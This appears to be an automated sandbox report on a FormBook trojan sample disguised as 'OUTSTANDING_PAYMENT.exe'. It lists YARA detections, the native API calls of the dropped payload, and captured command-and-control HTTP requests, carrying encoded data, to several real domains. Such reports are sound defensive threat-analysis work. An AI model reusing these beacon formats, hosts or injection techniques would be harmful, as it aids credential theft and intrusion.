          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/product/mail/forward/?ipartner=6666&adv_id=click_mail_forward&utm_source=stpg_all
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/whois/?searchWord=LANDLOTTO.RU&ipartner=6666&adv_id=whois_info&utm_source=stpg_al
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru?ipartner=6666&adv_id=logo&utm_source=stpg_all&utm_medium=link&utm_campaign=logo
          Source: unknownHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: unknownDNS traffic detected: queries for: www.themssterofssuepnse.rest
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== HTTP/1.1Host: www.dirdikyepedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.g2fm.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== HTTP/1.1Host: www.mynichemarket.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.landlotto.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=rLgLF68UEZ/jOQpbJtvCh1aTqtb77wkxPt9G2kjS7kCRXhXDnB6LHrmjVzEzts5aMFPYOamRADOx5QsnbVGJmi/5P43wAiKcGg== HTTP/1.1Host: www.gorwly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== HTTP/1.1Host: www.allison2patrick.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.glb-mobility.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== HTTP/1.1Host: www.fanversewallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.karlscurry.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: OUTSTANDING_PAYMENT.exe
          Sample has a suspicious name (potential lure to open the executable)
          Source: OUTSTANDING_PAYMENT.exeStatic file information: Suspicious name
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C5279E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F31D7
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F3377
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00405833
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004038AA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004038B3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004222AA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00401B90
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421BAC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421CCE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00422584
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040560B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00405613
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00420709
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00420713
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004017CF
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004217CD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004017D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421FDC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040BFEE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040BFF3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C5279E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129F900
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136E824
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351002
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013620A8
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB090
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013628EC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01362B28
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CEBB0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135DBD2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013503DA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013622AE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01290D20
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01362D07
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01361D55
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013625DD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A841F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135D466
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 0129B150 appears 41 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 00C52193 appears 44 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 00C52D64 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E613 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E6C3 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E743 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E7F3 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E73D NtClose,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E7ED NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DB040 NtSuspendThread,
